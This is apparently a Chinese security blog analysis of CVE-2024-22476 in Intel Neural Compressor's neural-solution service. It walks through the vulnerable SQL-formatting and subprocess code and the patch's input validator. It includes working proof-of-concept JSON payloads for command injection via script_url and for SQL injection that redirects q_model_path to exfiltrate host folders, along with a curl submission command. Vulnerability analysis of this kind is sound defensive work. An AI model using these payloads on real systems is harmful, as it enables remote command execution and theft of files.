Intel® Neural Compressor CVE-2024-22476 漏洞分析

渗透技巧 6个月前 admin

56 0 0

点击蓝字关注我们

Intel® Neural Compressor

CVE-2024-22476

漏洞分析

安全实验室安全研究组的漏洞预警在5月16日收到告警，intel的Neural Compressor组件中存在远程命令注入漏洞，目前的评分是10分，漏洞的CVE编号是CVE-2024-22476。Neural Compressor主要应用于CPU或GPU上的深度学习部署，支持所有主流深度学习框架（TensorFlow、PyTorch、ONNX Runtime和MXNet）上流行的模型压缩技术，例如量化、剪枝（稀疏性）、蒸馏和神经架构搜索。它可以帮助减少模型的大小，减少计算和存储需求，并加快推理速度。包含漏洞的组件是其中的 neural-solution，使用 solution 用户可以通过 RESTful/gRPC API 来提交优化任务。solution 会自动将这些任务分派给一个或多个节点，从而简化整个过程。

准备工作

docker安装，查看docker容器，并打开：

docker run --name zs_ubuntu22.04 -it ubuntu:22.04docker psdocker attach container_idapt-get install wget

Ubuntu22.04下安装Anaconda，一路回车和YES，并打开：

apt updateapt install curl -ycurl --output conda.sh https://repo.anaconda.com/archive/Anaconda3-2024.02-1-Linux-x86_64.shbash conda.shsource ~/.bashrcconda create --name code python=3.10conda activate code

官方提供了pip安装方式，要求python版本大于3.8。直接使用pip安装：

pip install neural-solution

然而，官方的 pip 库中依然是有漏洞的版本，所以大家正式使用的时候尽量从官方的 GitHub 中下载。

tips：如果遇到mpi4py的安装问题可以执行以下命令解决：

apt-get install mpich

漏洞复现

漏洞代码分析

根据修复补丁反推可知，漏洞产生原因是在task参数的输入中存在过滤不严的问题。结合测试用例，根据输入参数的不同数据类型以及对输入参数的不同处理流程，比如利用wget的下载模型过程，参数是task.script_url本身应该是一个下载链接的url，因为没有进行检查，在后边附加一些指令，可以实现命令注入等。下面分析了漏洞成因及原理。

task 参数

一个task是用户tuning请求的抽象，由neural solution服务处理。

class Task:...
    def __init__(        self,        task_id,        arguments,        workers,        status,        script_url,        optimized,        approach,        requirement,        result="",        q_model_path="",    ):        """Init task.
        Args:            task_id (str): the id of task.            arguments (str): the running arguments for task.            workers (int): the resources.            status (str): "pending", "running", "done", "failed"            script_url (str): the python script address            optimized (bool): the running script has been optimized            approach (str): the quantization method            requirement (str): python packages            result (str, optional): the result of task. Defaults to "".            q_model_path (str, optional): the quantized model path. Defaults to "".        """...

TaskDb 管理所有任务，它将任务保存在数据库中，管理任务队列和任务详情。

class TaskDB:...
    def __init__(self, db_path):
        self.task_queue = deque()        create_dir(db_path)        # sqlite should set this check_same_thread to False        self.conn = sqlite3.connect(f"{db_path}", check_same_thread=False)        self.cursor = self.conn.cursor()        self.cursor.execute(            "create table if not exists task(id TEXT PRIMARY KEY, arguments varchar(100), "            + "workers int, status varchar(20), script_url varchar(500), optimized integer, "            + "approach varchar(20), requirements varchar(500), result varchar(500), q_model_path varchar(200))"        )        self.conn.commit()        # self.task_collections = []        self.lock = threading.Lock()

前端入口SQL/CMD注入

以RESTful API提交task为例，用户可以通过/task/submit/来调用服务。

@app.post("/task/submit/")async def submit_task(task: Task):...    msg = "Task submitted successfully"    status = "successfully"    # search the current    db_path = get_db_path(config.workspace)
    if os.path.isfile(db_path):        conn = sqlite3.connect(db_path)        cursor = conn.cursor()        task_id = str(uuid.uuid4()).replace("-", "")        sql = (            r"insert into task(id, script_url, optimized, arguments, approach, requirements, workers, status)"            + r" values ('{}', '{}', {}, '{}', '{}', '{}', {}, 'pending')".format(                task_id,                task.script_url,                task.optimized,                list_to_string(task.arguments),                task.approach,                list_to_string(task.requirements),                task.workers,            )        )        cursor.execute(sql)        conn.commit()...

其中的格式化 sql 语句

sql = (    r"insert into task(id, script_url, optimized, arguments, approach, requirements, workers, status)"    + r" values ('{}', '{}', {}, '{}', '{}', '{}', {}, 'pending')".format(        task_id,        task.script_url,        task.optimized,        list_to_string(task.arguments),        task.approach,        list_to_string(task.requirements),        task.workers,    ))cursor.execute(sql)

在这里sql命令没有经过任何检查就直接执行，恶意攻击者可以进行SQL注入。攻击者可以更新taskDB中任何任务的q_model_path字段（或任何其他字段）。

任意文件下载

@app.get("/download/{task_id}")async def download_file(task_id: str):    db_path = get_db_path(config.workspace)    if os.path.isfile(db_path):        conn = sqlite3.connect(db_path)        cursor = conn.cursor()        cursor.execute(r"select status, result, q_model_path from task where id=?", (task_id,))        res = cursor.fetchone()        cursor.close()        conn.close()...    path = res[2]    zip_filename = "quantized_model.zip"    zip_filepath = os.path.abspath(os.path.join(get_task_workspace(config.workspace), task_id, zip_filename))    # create zipfile and add file    with zipfile.ZipFile(zip_filepath, "w", zipfile.ZIP_DEFLATED) as zip_file:        for root, dirs, files in os.walk(path):            for file in files:                file_path = os.path.join(root, file)                zip_file.write(file_path, os.path.basename(file_path))
    return FileResponse(        zip_filepath,        media_type="application/octet-stream",        filename=zip_filename,        background=BackgroundTask(os.remove, zip_filepath),    )

同时，可以利用 API /download/下载由q_model_path字段指定的任何文件夹，并且此字段没有进行过滤或验证。如果攻击者更新数据库中任务的q_model_path字段，则可以轻松地从主机系统下载任何内容。

命令注入

仍然以RESTful API提交task为例，用户可以通过/task/submit/来调用服务。

@app.post("/task/submit/")async def submit_task(task: Task):    if not is_valid_task(task.dict()):        raise HTTPException(status_code=422, detail="Invalid task")...    if os.path.isfile(db_path):        conn = sqlite3.connect(db_path)        cursor = conn.cursor()        task_id = str(uuid.uuid4()).replace("-", "")        sql = (            r"insert into task(id, script_url, optimized, arguments, approach, requirements, workers, status)"            + r" values ('{}', '{}', {}, '{}', '{}', '{}', {}, 'pending')".format(                task_id,                task.script_url,                task.optimized,                list_to_string(task.arguments),                task.approach,                list_to_string(task.requirements),                task.workers,            )        )

在这里sql命令没有经过任何检查就直接执行，恶意攻击者可以进行 SQL 注入。攻击者可以更新 taskDB 中任何任务的 script_url 字段（或任何其他字段）。

def prepare_task(self, task: Task):
...    if is_remote_url(task.script_url):        task_url = task.script_url.replace("github.com", "raw.githubusercontent.com").replace("blob", "")        try:            subprocess.check_call(["wget", "-P", self.task_path, task_url])        except subprocess.CalledProcessError as e:            logger.info("Failed: {}".format(e.cmd))...    if not task.optimized:        # Generate quantization code with Neural Coder API        neural_coder_cmd = ["python -m neural_coder --enable --approach"]        # for users to define approach: "static", "static_ipex", "dynamic", "auto"        approach = task.approach        neural_coder_cmd.append(approach)        if is_remote_url(task.script_url):            self.script_name = task.script_url.split("/")[-1]        neural_coder_cmd.append(self.script_name)        neural_coder_cmd = " ".join(neural_coder_cmd)        full_cmd = """cd {}n{}""".format(self.task_path, neural_coder_cmd)        p = subprocess.Popen(full_cmd, shell=True)  # nosec...

在POST请求的正文中，script_url 参数在后端没有经过验证或过滤。在subprocess.check_call([“wget”, “-P”, self.task_path, task_url])这里，攻击者可以操纵该参数来远程执行任意命令。

POC

在本机开启服务

# Start neural solution service with custom configuration(code) root@c0c72ded848f:/home# neural_solution start --task_monitor_port=22222 --result_monitor_port=33333 --restful_api_port=80002024-05-23 07:45:22 [INFO] No environment specified, use environment activated: (code) as the task runtime environment.2024-05-23 07:45:24 [INFO] Neural Solution Service Started!2024-05-23 07:45:24 [INFO] Service log saving path is in "/home/ns_workspace/serve_log"2024-05-23 07:45:24 [INFO] To submit task at: 172.17.0.3:8000/task/submit/2024-05-23 07:45:24 [INFO] [For information] neural_solution -h

CMD注入

创建 poc 文件test.json

{  "script_url": "https://www.baidu.com;ls>2.txt",  "optimized": "False",  "arguments": [    "--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result"  ],  "approach": "static",  "requirements": [],  "workers": 1}

提交任务，触发命令注入漏洞：

(code) root@c0c72ded848f:/home# python  -m neural_solution.frontend.gRPC.client submit --request="test.json"2024-05-23 07:47:27 [INFO] Try to start gRPC server.2024-05-23 07:47:27 [INFO] Parsed task:2024-05-23 07:47:27 [INFO] {2024-05-23 07:47:27 [INFO]     'script_url': 'https://www.baidu.com;ls>2.txt',2024-05-23 07:47:27 [INFO]     'optimized': 'False',2024-05-23 07:47:27 [INFO]     'arguments': [2024-05-23 07:47:27 [INFO]         '--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result'2024-05-23 07:47:27 [INFO]     ],2024-05-23 07:47:27 [INFO]     'approach': 'static',2024-05-23 07:47:27 [INFO]     'requirements': [2024-05-23 07:47:27 [INFO]     ],2024-05-23 07:47:27 [INFO]     'workers': 12024-05-23 07:47:27 [INFO] }2024-05-23 07:47:27 [INFO] Healthy2024-05-23 07:47:27 [INFO] Neural Solution is running.2024-05-23 07:47:27 [INFO] successfully2024-05-23 07:47:27 [INFO] 93d5ca44800647f7a939d2652a6eb1e42024-05-23 07:47:27 [INFO] Task submitted successfully

服务器触发漏洞，生成文件：

SQL注入

创建 poc 文件test.json

{  "script_url": "https://www.baidu.com",  "optimized": "False",  "arguments": [],  "approach": "5', '6', 7, 'pending'), ('7f8364d1b9884e5aa409b148a67fb666', '2', 3, '4', '5', '6', 7, 'done') ON CONFLICT (id) DO UPDATE SET id = '7f8364d1b9884e5aa409b148a67fb666', status = 'done', q_model_path = '/home/victim' --",  "requirements": [],  "workers": 1}

提交任务，触发SQL注入漏洞：

curl -H "Content-Type: application/json --data @./test.json  http://127.0.0.1:8000/task/submit/{"status":"successfully","task_id":"f6045c12317e41f8bef6ebddd9911049","msg":"Task submitted successfully"}

服务器触发漏洞，下载文件：

漏洞修复

intel 在 Neural Compressor v2.5 Release 版本中修复了该问题，在neural_solution/frontend/utility.py 文件中增加了两个函数用来过滤命令注入。

def is_invalid_str(to_test_str: str):    return any(char in to_test_str for char in [" ", '"', "'", "&", "|", ";", "`", ">"])

def is_valid_task(task: dict) -> bool:    required_fields = ["script_url", "optimized", "arguments", "approach", "requirements", "workers"]
    for field in required_fields:        if field not in task:            return False
    if not isinstance(task["script_url"], str) or is_invalid_str(task["script_url"]):        return False
    if (isinstance(task["optimized"], str) and task["optimized"] not in ["True", "False"]) or (        not isinstance(task["optimized"], str) and not isinstance(task["optimized"], bool)    ):        return False
    if not isinstance(task["arguments"], list):        return False    else:        for argument in task["arguments"]:            if is_invalid_str(argument):                return False
    if not isinstance(task["approach"], str) or task["approach"] not in ["static", "static_ipex", "dynamic", "auto"]:        return False
    if not isinstance(task["requirements"], list):        return False    else:        for requirement in task["requirements"]:            if is_invalid_str(requirement):                return False
    if not isinstance(task["workers"], int) or task["workers"] < 1:        return False
    return True